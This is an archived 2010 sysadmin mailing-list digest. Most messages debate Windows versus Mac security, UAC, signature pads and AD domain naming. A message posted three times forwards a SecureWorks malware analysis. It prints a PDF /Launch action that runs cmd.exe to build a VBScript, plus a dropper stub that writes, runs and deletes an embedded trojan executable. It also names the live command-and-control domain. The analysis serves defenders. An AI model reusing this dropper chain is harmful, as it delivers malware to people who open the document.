> Your "MS simply flips a switch and expects devs to comply" sentiment  is an
> inaccurate oversimplification.
>
> -sc
>
> > -Original Message-
> > From: Ben Scott [mailto:mailvor...@gmail.com]
> > Sent: Wednesday, April 28, 2010 3:57 PM
> > To: NT System Admin Issues
> > Subject: Re: WTF? Fake AV
> >
> > On Wed, Apr 28, 2010 at 12:53 PM, Steven M. Caesare
> >  wrote:
> > > A) hardware driver models are a somewhat different beast, and that's
> > > held true for many a platform, and isn't really germane to what we
> are
> > > discussing here.
> >
> >   The only point I was making (and the one you're determined to
> ignore, it
> > appears): Microsoft routinely throws their weight around to tell the
> rest of
> > the industry to change to Microsoft's new way of doing things.
> Microsoft
> > elected not to do that with security.
> >
> >   The question was asked (paraphrased): "Why did it take Microsoft so
> long to
> > do anything about security?"  I answered that question.  No less, no
> more.
> > You're the one who keeps trying to drag the question off into the
> weeds.
> >
> >   Of course, an equally valid question would be, "Why did it take
> Apple so
> > long to do anything about security?"  But that wasn't the question I
> was
> > addressing.
> >
> > > Using AV infection #'s to compare those things and draw the
> conclusion
> > > he did is no accurate, IMO.
> >
> >   That I would agree with.
> >
> > -- Ben
> >
> > ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~
> >   ~
>
> ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~ <
> http://www.sunbeltsoftware.com/Business/VIPRE-Enterprise/>  ~
>
>
> ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~ <
> http://www.sunbeltsoftware.com/Business/VIPRE-Enterprise/>  ~
>
>
>
>
> ~ Finally, powerful endpoint security that ISN'T a resource hog! ~
> ~   ~
>
>

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.

[Stu Sjouwerman]

We will be releasing a detection for this PDF exploit in a couple of hours.

Warm regards,


Stu Sjouwerman
Co-Founder, Publisher, Sunbelt Media
P: +1-727-562-0101 ext 218
F: +1-727-562-5199
s...@sunbelt-software.com


  


-Original Message-
From: Sean Rector [mailto:sean.rec...@vaopera.org] 
Sent: Wednesday, April 28, 2010 5:07 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.

Thanks, Z!

Sean Rector, MCSE

-Original Message-
From: Ziots, Edward [mailto:ezi...@lifespan.org] 
Sent: Wednesday, April 28, 2010 4:50 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.

Gang there is another PDF exploit going on that may or may not be hitting your 
places: Credit to Secureworks (tm) for the writeup below. 

See below: 
Ideals: Set up a zone in your DNS called jademason.com and set it to answer to 
127.0.0.1, and clear the cache on your DNS servers accordingly. Which should 
blackhole the zone. 

Note this is a fast-flux domain, as you can see from the different dns returns 
on nslookup. 
Also scan all your PDF files, some of the major AV vendors are picking this up 
and its packed exploit. 
> jademason.com
Server:  xx.xx.xx.xx
Address:  xx.xx.xx.xx
Non-authoritative answer:
Name:jademason.com
Addresses:  190.184.91.252
  89.76.186.112
  178.24.184.230
  190.165.141.141
  190.160.133.173
  89.103.178.41
  78.90.2.123
  89.74.43.46

About 5 mins later:
Non-authoritative answer:
Name:jademason.com
Addresses:  201.174.208.101
  89.135.159.78
  94.246.125.4
  190.184.91.252
  201.241.102.230
  89.74.43.46
  92.230.71.40
  201.132.99.207



From: notificati...@yyybank.com
[mailto:notificati...@yyybank.com]
Sent: Tuesday, April 27, 2010 7:47 AM
To: x...@bank.com
Subject: setting for your mailbox are changed

SMTP and POP3 servers for x...@yyybank.com mailbox are changed.
Please carefully read the attached instructions before updating settings.
It contained a file called "doc.pdf". That file was, of course, malicious in 
nature. It used the PDF Launch vulnerability to run echo some commands into a 
bat file and then bootstrap itself to running the Emold downloader trojan. 
Let's take a look. 


8 0 obj
<<
 /Type /Action
 /S /Launch
 /Win
 <<
  /F (cmd.exe)
  /P (/c echo Set fso=CreateObject("Scripting.FileSystemObject")
  > script.vbs && echo Set f=fso.OpenTextFile("doc.pdf", 1, True)
  >> script.vbs && echo pf=f.ReadAll
  >> script.vbs && echo s=InStr(pf,"'SS")
  >> script.vbs && echo e=InStr(pf,"'EE")
  >> script.vbs && echo s=Mid(pf,s,e-s)
  >> script.vbs && echo Set z=fso.OpenTextFile("batscript.vbs", 2, True)
  >> script.vbs && echo s = Replace(s,"%","")
  >> script.vbs && echo z.Write(s)
  >> script.vbs && script.vbs && batscript.vbs This uses cmd.exe to write some 
lines of text to a file called script.vbs and then executes script.vbs and 
batscript.vbs. 

Let's look at how script.vbs ends up: 


Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.OpenTextFile("doc.pdf", 1, True) echo pf=f.ReadAll echo 
s=InStr(pf,"'SS") echo e=InStr(pf,"'EE")
s=Mid(pf,s,e-s)
Set z=fso.OpenTextFile("batscript.vbs", 2, True) s = Replace(s,"%","")
z.Write(s)
When Script.vbs runs, it opens doc.pdf and looks for the tags "SS" and "EE" to 
mark the beginning and end of a section of the pdf. It grabs that section, does 
a little bit of text manipulation and then writes the result to batscript.vbs. 

Next let's look what's in that tagged section of doc.pdf (that ends up 
batscript.vbs): 


5 0 obj
<< /Length 46 >>
stream
BT
/F1 34 Tf
50 500 Td
(Important Information
doc.pdf)Tj

%'SS
%Dim b
%Function c(d)
%c=chr(d)
%End Function
%b=Array(c(077),c(090),c(144),c(000),c(003),c(000),c(000),c(000),
c(004),c(000),c(000)...
...this line is 248413 characters long...
...c(000),c(000),c(000),c(000 ),"")
%Set fso = CreateObject("Scripting.FileSystemObject")
%Set f = fso.OpenTextFile("game.exe", 2, True) %For i = 0 To 35328
%f.write(b(i))
%Next
%f.close()
%Set WshShell = WScript.CreateObject("WScript.Shell")
%WshShell.Run "cmd.exe /c game.exe"
%WScript.Sleep 3000
%Set f  = FSO.GetFile("game.exe")
%f.Delete
%Set f  = FSO.GetFile("batscript.vbs")
%f.Delete
%Set f  = FSO.GetFile("script.vbs")
%f.Delete
%'EE
endstream
We can now see that the array stored in b is actually an obfuscated executable 
file that is stored in game.exe. After running game.exe this script (executed 
in batscript.vbs) cleans up after itself by removing game.exe, batscript.vbs, 
and script.vbs. 

Game.exe is the Elmod trojan. This is a generic downloader which can be used to 
install any number of second stage trojans. It can be identified by the 
presence of the file C:/Program Files/Microsoft Common/svchost.exe, the 
registry key "software\Microsoft\Windows NT\CurrentVersion\Image File Execution 
Options\explorer.exe", and

RE: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.

[Sean Rector]

Thanks, Z!

Sean Rector, MCSE

-Original Message-
From: Ziots, Edward [mailto:ezi...@lifespan.org] 
Sent: Wednesday, April 28, 2010 4:50 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.

Gang there is another PDF exploit going on that may or may not be hitting your 
places: Credit to Secureworks (tm) for the writeup below. 

See below: 
Ideals: Set up a zone in your DNS called jademason.com and set it to answer to 
127.0.0.1, and clear the cache on your DNS servers accordingly. Which should 
blackhole the zone. 

Note this is a fast-flux domain, as you can see from the different dns returns 
on nslookup. 
Also scan all your PDF files, some of the major AV vendors are picking this up 
and its packed exploit. 
> jademason.com
Server:  xx.xx.xx.xx
Address:  xx.xx.xx.xx
Non-authoritative answer:
Name:jademason.com
Addresses:  190.184.91.252
  89.76.186.112
  178.24.184.230
  190.165.141.141
  190.160.133.173
  89.103.178.41
  78.90.2.123
  89.74.43.46

About 5 mins later:
Non-authoritative answer:
Name:jademason.com
Addresses:  201.174.208.101
  89.135.159.78
  94.246.125.4
  190.184.91.252
  201.241.102.230
  89.74.43.46
  92.230.71.40
  201.132.99.207



From: notificati...@yyybank.com
[mailto:notificati...@yyybank.com]
Sent: Tuesday, April 27, 2010 7:47 AM
To: x...@bank.com
Subject: setting for your mailbox are changed

SMTP and POP3 servers for x...@yyybank.com mailbox are changed.
Please carefully read the attached instructions before updating settings.
It contained a file called "doc.pdf". That file was, of course, malicious in 
nature. It used the PDF Launch vulnerability to run echo some commands into a 
bat file and then bootstrap itself to running the Emold downloader trojan. 
Let's take a look. 


8 0 obj
<<
 /Type /Action
 /S /Launch
 /Win
 <<
  /F (cmd.exe)
  /P (/c echo Set fso=CreateObject("Scripting.FileSystemObject")
  > script.vbs && echo Set f=fso.OpenTextFile("doc.pdf", 1, True)
  >> script.vbs && echo pf=f.ReadAll
  >> script.vbs && echo s=InStr(pf,"'SS")
  >> script.vbs && echo e=InStr(pf,"'EE")
  >> script.vbs && echo s=Mid(pf,s,e-s)
  >> script.vbs && echo Set z=fso.OpenTextFile("batscript.vbs", 2, True)
  >> script.vbs && echo s = Replace(s,"%","")
  >> script.vbs && echo z.Write(s)
  >> script.vbs && script.vbs && batscript.vbs This uses cmd.exe to write some 
lines of text to a file called script.vbs and then executes script.vbs and 
batscript.vbs. 

Let's look at how script.vbs ends up: 


Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.OpenTextFile("doc.pdf", 1, True) echo pf=f.ReadAll echo 
s=InStr(pf,"'SS") echo e=InStr(pf,"'EE")
s=Mid(pf,s,e-s)
Set z=fso.OpenTextFile("batscript.vbs", 2, True) s = Replace(s,"%","")
z.Write(s)
When Script.vbs runs, it opens doc.pdf and looks for the tags "SS" and "EE" to 
mark the beginning and end of a section of the pdf. It grabs that section, does 
a little bit of text manipulation and then writes the result to batscript.vbs. 

Next let's look what's in that tagged section of doc.pdf (that ends up 
batscript.vbs): 


5 0 obj
<< /Length 46 >>
stream
BT
/F1 34 Tf
50 500 Td
(Important Information
doc.pdf)Tj

%'SS
%Dim b
%Function c(d)
%c=chr(d)
%End Function
%b=Array(c(077),c(090),c(144),c(000),c(003),c(000),c(000),c(000),
c(004),c(000),c(000)...
...this line is 248413 characters long...
...c(000),c(000),c(000),c(000 ),"")
%Set fso = CreateObject("Scripting.FileSystemObject")
%Set f = fso.OpenTextFile("game.exe", 2, True) %For i = 0 To 35328
%f.write(b(i))
%Next
%f.close()
%Set WshShell = WScript.CreateObject("WScript.Shell")
%WshShell.Run "cmd.exe /c game.exe"
%WScript.Sleep 3000
%Set f  = FSO.GetFile("game.exe")
%f.Delete
%Set f  = FSO.GetFile("batscript.vbs")
%f.Delete
%Set f  = FSO.GetFile("script.vbs")
%f.Delete
%'EE
endstream
We can now see that the array stored in b is actually an obfuscated executable 
file that is stored in game.exe. After running game.exe this script (executed 
in batscript.vbs) cleans up after itself by removing game.exe, batscript.vbs, 
and script.vbs. 

Game.exe is the Elmod trojan. This is a generic downloader which can be used to 
install any number of second stage trojans. It can be identified by the 
presence of the file C:/Program Files/Microsoft Common/svchost.exe, the 
registry key "software\Microsoft\Windows NT\CurrentVersion\Image File Execution 
Options\explorer.exe", and because it phones home to (currently) jademason.com.

Adobe has said that the Launch functionality is a feature, not a bug. Adobe is 
looking into the issue, but has not said what action, if any, they intended to 
take to mitigate the danger. Their post on the matter does include directions 
for turning off this functionality.

Edward Ziots
CISSP,MCSA,MCP+I,Security +,Network +,CCA Network Engineer Lifespan Organization
401-639-3505
ezi...@li

RE: sig pad for Word

[Raper, Jonathan - Eagle]

Have you looked at Topaz? I don't know what hey cost, but that's what we've 
used for our physician signature captures.


Jonathan L. Raper, A+, MCSA, MCSE
Technology Coordinator
Eagle Physicians & Associates, PA
jra...@eaglemds.commailto:%20jra...@eaglemds.com>
www.eaglemds.comhttp://www.eaglemds.com/>


From: James Kerr [mailto:cluster...@gmail.com]
Sent: Wednesday, April 28, 2010 3:08 PM
To: NT System Admin Issues
Subject: Re: sig pad for Word

Well its for our clients to sign off on medical consent forms.
- Original Message -
From: Kevin Lundy
To: NT System Admin Issues
Sent: Wednesday, April 28, 2010 3:05 PM
Subject: Re: sig pad for Word

Have you considered digital signatures?
On Wed, Apr 28, 2010 at 2:46 PM, James Kerr 
mailto:cluster...@gmail.com>> wrote:
Can anyone recommened a inexpensive USB signature pad for signing word 
documents?

James

















Any medical information contained in this electronic message is CONFIDENTIAL 
and privileged. It is unlawful for unauthorized persons to view, copy, 
disclose, or disseminate CONFIDENTIAL information. This electronic message may 
contain information that is confidential and/or legally privileged. It is 
intended only for the use of the individual(s) and/or entity named as 
recipients in the message. If you are not an intended recipient of this 
message, please notify the sender immediately and delete this material from 
your computer. Do not deliver, distribute or copy this message, and do not 
disclose its contents or take any action in reliance on the information that it 
contains.

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: Admin rights, UAC, etc. (was: WTF? Fake AV)

[Ziots, Edward]

Define "Properly Secured" because what is secured from one users
prospective is totally different than what another user thinks, and no
XP machine or computer for that matter can be 100% protected. 

 

I also second the notion about UAC, that is what it was built for, if
you turn it off because you don't like the prompts when you run items,
then you have just defeated a major security control in the OS, and its
only going to be time before you get 0wned.. 

 

Z

 

Edward Ziots

CISSP,MCSA,MCP+I,Security +,Network +,CCA

Network Engineer

Lifespan Organization

401-639-3505

ezi...@lifespan.org

 

From: Jon Harris [mailto:jk.har...@gmail.com] 
Sent: Wednesday, April 28, 2010 4:46 PM
To: NT System Admin Issues
Subject: Re: Admin rights, UAC, etc. (was: WTF? Fake AV)

 

" With the exception of exploitation of unpatched vulnerabilities,
I've never seen malware lead to a system compromise on a
properly-secured Win XP machine"

 

Sorry but how many (l)users know how to this?  How many home owners even
know this is possible.  I would much rather see a Windows Vista with UAC
turned on or Windows 7 in one of their hands than the typical XP box.
You can teach people not to click Okay or Yes and then call and ask or
just go on with out allowing the security holes.  Yes it is hard to do
and no you sometimes have to make it hurt to get their attention but
like James says charge them more each time they bring in a corrupted
system and they pain will cause them to start using their heads.

On Wed, Apr 28, 2010 at 11:13 AM, Ben Scott 
wrote:

On Wed, Apr 28, 2010 at 10:18 AM,  
wrote:
> Are there any reports out there that show Windows 7 running with UAC
that
> its minimizes the infections of spyware.

 I too would be interested in seeing hard data on this.  I've seen
lots of marketing claims, and the occasional anecdote, but I remain
unconvinced that UAC (as typically configured, and for the SOHO user)
will do anything more than train lusers to click "Allow" when they see
it.  I've certainly got my own anecdotal evidence that lusers do just
that.

 To me, the chief advantage to UAC is FRV (filesystem and registry
virtualization).  It lets software which thinks it needs to write to
protected locations run anyway.  *That's* a big win.  Lets people who
understand security cope with software vendors who don't.

 The ability for UAC to use the GUI to prompt for alternate admin
credentials for privilege elevation is very convenient, but it's not
compelling to me.  You can achieve similar results using RUNAS.  Not
as convenient, but gets the job done.

> While I am not a huge fan of MACS ...

 It took me a minute to figure out you meant "Macintoshes" and not
"Mandatory Access Control System".  "Mac" -- the computer from Apple
-- is not an acronym.  :)

 (It wouldn't have been so confusing except that MACS and DACS are
the two common models used for describing access control/permissions.
Windows mostly uses DACS (hence, DACL, Discretionary Access Control
List), but the "Integrity Levels" features in Win 6.x are heading in
the direction of MACS.)

> .. their security model is obviously much better than Windows.

 While Windows is often shipped with a default no-security admin
account, Windows fully supports creating a user without admin rights.
It's what we do for *everybody* here at %WORK%.  We've been doing it
for *years*, and it works very well.

 The only hard part is convincing software vendors that admin rights
are not required to do things like word processing.

 More generally, one problem is the many PC builders who ship their
computers configured to run users as admins by default.  Even if UAC
works as advertised, that's not a good thing.

 But the real hard problem here is home lusers who don't understand
security.  They consider security a problem, something to be removed.
And they will install whatever a web page tells them to.  I don't have
a good solution for that.  I suspect nobody does.

> Even with users not in admin group in Windows XP, Vista I have
> seen malware get right on and hose a machine.

 With the exception of exploitation of unpatched vulnerabilities,
I've never seen malware lead to a system compromise on a
properly-secured Win XP machine.

 I've seen it screw up a user account pretty well, to the point where
it's easier to erase and reset the user profile than it is to repair
the registry wreckage.  Most of the time, though, all we have to do is
login as an admin and delete *.EXE *.DLL *.OCX under their user
profile folder.

 Are you using a proper set of ACLs on the filesystem?  My strategy
is that users should only be able to create/modify under their own
user profile folder.  Nothing else.  Well, the default C:\WINDOWS\TEMP
permissions are okay.

 In particular, by default, users can create files and folders under
 and .
This is a very bad idea on Microsoft's part.  Malware gets in,
compromises "All Users", admin logs in, Explorer or something else
trips over something in "All Users", malwa

RE: WTF? Fake AV

[Stu Sjouwerman]

"an incredible fire-hose coming in at about 50Gigs a day"

Warm regards,


Stu Sjouwerman
Co-Founder, Publisher, Sunbelt Media
P: +1-727-562-0101 ext 218
F: +1-727-562-5199
s...@sunbelt-software.com


  


-Original Message-
From: Mayo, Bill [mailto:bem...@pittcountync.gov] 
Sent: Wednesday, April 28, 2010 4:33 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

Not sure what point you are disputing but 115 (total) versus 70,000 per day 
(your numbers from earlier today) is kind of lopsided.  I'm not saying that 115 
isn't enough to worry about, but if 115 in 8 years is "growing fast", what in 
the world do you call 70,000 per day?!?!

-Original Message-
From: Stu Sjouwerman [mailto:s...@sunbelt-software.com] 
Sent: Wednesday, April 28, 2010 4:17 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

Erm, There are 115 known strains (and growing fast) of malware for the Mac. 
That's why we are releasing a VIPRE client for the Mac in Q2. They have sold 
enough machines to make it attractive for cyber crime to go after. All security 
models will break as per the principle of the 'bigger hammer'. 

Warm regards,


Stu Sjouwerman
Co-Founder, Publisher, Sunbelt Media
P: +1-727-562-0101 ext 218
F: +1-727-562-5199
s...@sunbelt-software.com


  


-Original Message-
From: Steven M. Caesare [mailto:scaes...@caesare.com]
Sent: Wednesday, April 28, 2010 4:10 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

And you are making the (rather dramatic, IMO) over generalization that 
Microsoft simply tells app vendors what to do and expects them to move at the 
drop of a hat.

The reality is that MS has typically bent over backwards to ensure backwards 
compatibility (to a fault you may argue) for applications wherever possible. 
That has been one of the tenets of their OS design since Windows had DOS boxes.

 They have compatibility flags within the OS to special case specific apps and 
installers. They has wow32 and wow64. They did FX!32 on Alpha.
They've supported old versions of API's along with new versions. They allow 
unsigned hardware even though the new model requires signed hardware. Etc, 
etc...

Heck, up until Vista you could still run something from 20 yr old DOS..

Now would they LIKE apps vendors to comply with new direction day1? Yes.
Do they all? No. So there is much notification, suggestion, development 
guidelines, DevCons, etc... to shepherd app vendors the right direction.

Your "MS simply flips a switch and expects devs to comply" sentiment  is an 
inaccurate oversimplification.

-sc

> -Original Message-
> From: Ben Scott [mailto:mailvor...@gmail.com]
> Sent: Wednesday, April 28, 2010 3:57 PM
> To: NT System Admin Issues
> Subject: Re: WTF? Fake AV
> 
> On Wed, Apr 28, 2010 at 12:53 PM, Steven M. Caesare 
>  wrote:
> > A) hardware driver models are a somewhat different beast, and that's 
> > held true for many a platform, and isn't really germane to what we
are
> > discussing here.
> 
>   The only point I was making (and the one you're determined to
ignore, it
> appears): Microsoft routinely throws their weight around to tell the
rest of
> the industry to change to Microsoft's new way of doing things.
Microsoft
> elected not to do that with security.
> 
>   The question was asked (paraphrased): "Why did it take Microsoft so
long to
> do anything about security?"  I answered that question.  No less, no
more.
> You're the one who keeps trying to drag the question off into the
weeds.
> 
>   Of course, an equally valid question would be, "Why did it take
Apple so
> long to do anything about security?"  But that wasn't the question I
was
> addressing.
> 
> > Using AV infection #'s to compare those things and draw the
conclusion
> > he did is no accurate, IMO.
> 
>   That I would agree with.
> 
> -- Ben
> 
> ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~ 
>   ~

~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~ 
  ~


~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~ 
  ~




~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~


~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: WTF? Fake AV

[Ziots, Edward]

Also there is a new Trojan dropper malware out there using PDF's and fake ( 
your Email settings have changed language) to get people to download or view a 
doc1.pdf file accordingly, which has a nasty payload.

The writeup was posted at Secureworks earlier yesterday, tried posting it to 
the list multiple times and everyones forefront email clients are beating me 
over the head saying I am sending them a Trojan dropper email, ohh well so much 
for trying to get the word out :) 

Z

Edward Ziots
CISSP,MCSA,MCP+I,Security +,Network +,CCA
Network Engineer
Lifespan Organization
401-639-3505
ezi...@lifespan.org


-Original Message-
From: Mayo, Bill [mailto:bem...@pittcountync.gov] 
Sent: Wednesday, April 28, 2010 4:33 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

Not sure what point you are disputing but 115 (total) versus 70,000 per day 
(your numbers from earlier today) is kind of lopsided.  I'm not saying that 115 
isn't enough to worry about, but if 115 in 8 years is "growing fast", what in 
the world do you call 70,000 per day?!?!

-Original Message-
From: Stu Sjouwerman [mailto:s...@sunbelt-software.com] 
Sent: Wednesday, April 28, 2010 4:17 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

Erm, There are 115 known strains (and growing fast) of malware for the Mac. 
That's why we are releasing a VIPRE client for the Mac in Q2. They have sold 
enough machines to make it attractive for cyber crime to go after. All security 
models will break as per the principle of the 'bigger hammer'. 

Warm regards,


Stu Sjouwerman
Co-Founder, Publisher, Sunbelt Media
P: +1-727-562-0101 ext 218
F: +1-727-562-5199
s...@sunbelt-software.com


  


-Original Message-
From: Steven M. Caesare [mailto:scaes...@caesare.com]
Sent: Wednesday, April 28, 2010 4:10 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

And you are making the (rather dramatic, IMO) over generalization that 
Microsoft simply tells app vendors what to do and expects them to move at the 
drop of a hat.

The reality is that MS has typically bent over backwards to ensure backwards 
compatibility (to a fault you may argue) for applications wherever possible. 
That has been one of the tenets of their OS design since Windows had DOS boxes.

 They have compatibility flags within the OS to special case specific apps and 
installers. They has wow32 and wow64. They did FX!32 on Alpha.
They've supported old versions of API's along with new versions. They allow 
unsigned hardware even though the new model requires signed hardware. Etc, 
etc...

Heck, up until Vista you could still run something from 20 yr old DOS..

Now would they LIKE apps vendors to comply with new direction day1? Yes.
Do they all? No. So there is much notification, suggestion, development 
guidelines, DevCons, etc... to shepherd app vendors the right direction.

Your "MS simply flips a switch and expects devs to comply" sentiment  is an 
inaccurate oversimplification.

-sc

> -Original Message-
> From: Ben Scott [mailto:mailvor...@gmail.com]
> Sent: Wednesday, April 28, 2010 3:57 PM
> To: NT System Admin Issues
> Subject: Re: WTF? Fake AV
> 
> On Wed, Apr 28, 2010 at 12:53 PM, Steven M. Caesare 
>  wrote:
> > A) hardware driver models are a somewhat different beast, and that's 
> > held true for many a platform, and isn't really germane to what we
are
> > discussing here.
> 
>   The only point I was making (and the one you're determined to
ignore, it
> appears): Microsoft routinely throws their weight around to tell the
rest of
> the industry to change to Microsoft's new way of doing things.
Microsoft
> elected not to do that with security.
> 
>   The question was asked (paraphrased): "Why did it take Microsoft so
long to
> do anything about security?"  I answered that question.  No less, no
more.
> You're the one who keeps trying to drag the question off into the
weeds.
> 
>   Of course, an equally valid question would be, "Why did it take
Apple so
> long to do anything about security?"  But that wasn't the question I
was
> addressing.
> 
> > Using AV infection #'s to compare those things and draw the
conclusion
> > he did is no accurate, IMO.
> 
>   That I would agree with.
> 
> -- Ben
> 
> ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~ 
>   ~

~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~ 
  ~


~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~ 
  ~




~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~


~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: Current AD domain naming best practices

[Michael B. Smith]

ADFS requires third party certificate. This means you have to find a trusted 
provider to issue the certificate. You won't get that for .int or .local. ASB's 
suggestion of using a COMPLETELY DIFFERENT domain (but still one you own), is 
completely valid.

In re: ADFS, from the ADFS deployment whitepaper:

Trusted certification authorities

Because both TLS/SSL and token signing rely on digital certificates, 
certification authorities (CAs) are an important part of ADFS. Public CAs, such 
as VeriSign, Inc., represent a mutually trusted third party that allows the 
identity of the bearer of a certificate to be identified. You can use 
enterprise CAs, such as Microsoft Certificate Services, for providing token 
signing and other internal certificate services.

If a client is presented with a server's authentication certificate, the client 
computer verifies that the CA that issued the certificate is in the client's 
list of trusted CAs and that the CA has not revoked that certificate. This 
verification ensures that the client has reached the intended server. When a 
certificate is used for verifying signed tokens, the client uses the 
certificate to verify that the token was issued by the correct federation 
server and that the token has not been tampered with.

UPN claim

When you configure the resource partner, you can specify whether a UPN claim is 
to be sent to the resource partner. You can also specify a suffix mapping so 
that any suffix is mapped into a specified outgoing suffix. For example, 
juli...@sales.tailspintoys.com can be mapped to juli...@tailspintoys.com. Note 
that only one outgoing suffix may be specified. 


E-mail claim

When you configure the resource partner, you can specify whether an e-mail 
claim is to be sent to the resource partner. You can also specify a suffix 
mapping so that any suffix is mapped into a specified suffix. For example, 
vernet...@sales.tailspintoys.com can be mapped to vernet...@tailspintoys.com. 
Note that only one outgoing suffix may be specified.


Regards,

Michael B. Smith
Consultant and Exchange MVP
http://TheEssentialExchange.com


-Original Message-
From: Joseph Heaton [mailto:jhea...@dfg.ca.gov] 
Sent: Wednesday, April 28, 2010 3:57 PM
To: NT System Admin Issues
Subject: Re: Current AD domain naming best practices

I'm simply gathering information on the 3 options, and what everyone 
recommends.  Unfortunately, there is no clear-cut "winner".  I've found that 
all 3 are valid options, depending on how much administrative overhead you want 
to add to the process.  However, Michael Smith brought up a rather strong 
concern over why different names would be bad, if you're possibly going to 
implement ADFS.

Anyway, I very much appreciate your, and everyone's, input.

Joe

>>> "Andrew S. Baker"  4/28/2010 12:33 PM >>>
A subdomain is fine, but suffers many of the same drawbacks as using a single 
DNS namespace.

And you're involving more DNS servers into the resolution process for what 
purpose again?

-ASB: http://XeeSM.com/AndrewBaker 

Sent from my Motorola Droid

On Apr 28, 2010 12:51 PM, "Joseph Heaton"  wrote:

Andrew,

So you don't recommend the subdomain?  Also, if you could expand on your 
answer, it'd be great, as I'm bringing all ideas to a meeting this afternoon, 
with pros/cons behind each option.

>>> "Andrew S. Baker"  4/28/2010 8:55 AM >>>

Use two separate domain names, even if you register the internal one.

You can avoid all manner of p...
the Novell guy is saying.  Is that

still true today? We are on private IPs internally, so external forces can't 
route to the inside an...


~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: WTF? Fake AV Thread Hijack, new PDF exploit making the rounds.

[Ziots, Edward]

Gang there is another PDF exploit going on that may or may not be hitting your 
places: Credit to Secureworks (tm) for the writeup below. 

See below: 
Ideals: Set up a zone in your DNS called jademason.com and set it to answer to 
127.0.0.1, and clear the cache on your DNS servers accordingly. Which should 
blackhole the zone. 

Note this is a fast-flux domain, as you can see from the different dns returns 
on nslookup. 
Also scan all your PDF files, some of the major AV vendors are picking this up 
and its packed exploit. 
> jademason.com
Server:  xx.xx.xx.xx
Address:  xx.xx.xx.xx
Non-authoritative answer:
Name:jademason.com
Addresses:  190.184.91.252
  89.76.186.112
  178.24.184.230
  190.165.141.141
  190.160.133.173
  89.103.178.41
  78.90.2.123
  89.74.43.46

About 5 mins later:
Non-authoritative answer:
Name:jademason.com
Addresses:  201.174.208.101
  89.135.159.78
  94.246.125.4
  190.184.91.252
  201.241.102.230
  89.74.43.46
  92.230.71.40
  201.132.99.207



From: notificati...@yyybank.com
[mailto:notificati...@yyybank.com]
Sent: Tuesday, April 27, 2010 7:47 AM
To: x...@bank.com
Subject: setting for your mailbox are changed

SMTP and POP3 servers for x...@yyybank.com mailbox are changed.
Please carefully read the attached instructions before updating settings.
It contained a file called "doc.pdf". That file was, of course, malicious in 
nature. It used the PDF Launch vulnerability to run echo some commands into a 
bat file and then bootstrap itself to running the Emold downloader trojan. 
Let's take a look. 


8 0 obj
<<
 /Type /Action
 /S /Launch
 /Win
 <<
  /F (cmd.exe)
  /P (/c echo Set fso=CreateObject("Scripting.FileSystemObject")
  > script.vbs && echo Set f=fso.OpenTextFile("doc.pdf", 1, True)
  >> script.vbs && echo pf=f.ReadAll
  >> script.vbs && echo s=InStr(pf,"'SS")
  >> script.vbs && echo e=InStr(pf,"'EE")
  >> script.vbs && echo s=Mid(pf,s,e-s)
  >> script.vbs && echo Set z=fso.OpenTextFile("batscript.vbs", 2, True)
  >> script.vbs && echo s = Replace(s,"%","")
  >> script.vbs && echo z.Write(s)
  >> script.vbs && script.vbs && batscript.vbs This uses cmd.exe to write some 
lines of text to a file called script.vbs and then executes script.vbs and 
batscript.vbs. 

Let's look at how script.vbs ends up: 


Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.OpenTextFile("doc.pdf", 1, True) echo pf=f.ReadAll echo 
s=InStr(pf,"'SS") echo e=InStr(pf,"'EE")
s=Mid(pf,s,e-s)
Set z=fso.OpenTextFile("batscript.vbs", 2, True) s = Replace(s,"%","")
z.Write(s)
When Script.vbs runs, it opens doc.pdf and looks for the tags "SS" and "EE" to 
mark the beginning and end of a section of the pdf. It grabs that section, does 
a little bit of text manipulation and then writes the result to batscript.vbs. 

Next let's look what's in that tagged section of doc.pdf (that ends up 
batscript.vbs): 


5 0 obj
<< /Length 46 >>
stream
BT
/F1 34 Tf
50 500 Td
(Important Information
doc.pdf)Tj

%'SS
%Dim b
%Function c(d)
%c=chr(d)
%End Function
%b=Array(c(077),c(090),c(144),c(000),c(003),c(000),c(000),c(000),
c(004),c(000),c(000)...
...this line is 248413 characters long...
...c(000),c(000),c(000),c(000 ),"")
%Set fso = CreateObject("Scripting.FileSystemObject")
%Set f = fso.OpenTextFile("game.exe", 2, True) %For i = 0 To 35328
%f.write(b(i))
%Next
%f.close()
%Set WshShell = WScript.CreateObject("WScript.Shell")
%WshShell.Run "cmd.exe /c game.exe"
%WScript.Sleep 3000
%Set f  = FSO.GetFile("game.exe")
%f.Delete
%Set f  = FSO.GetFile("batscript.vbs")
%f.Delete
%Set f  = FSO.GetFile("script.vbs")
%f.Delete
%'EE
endstream
We can now see that the array stored in b is actually an obfuscated executable 
file that is stored in game.exe. After running game.exe this script (executed 
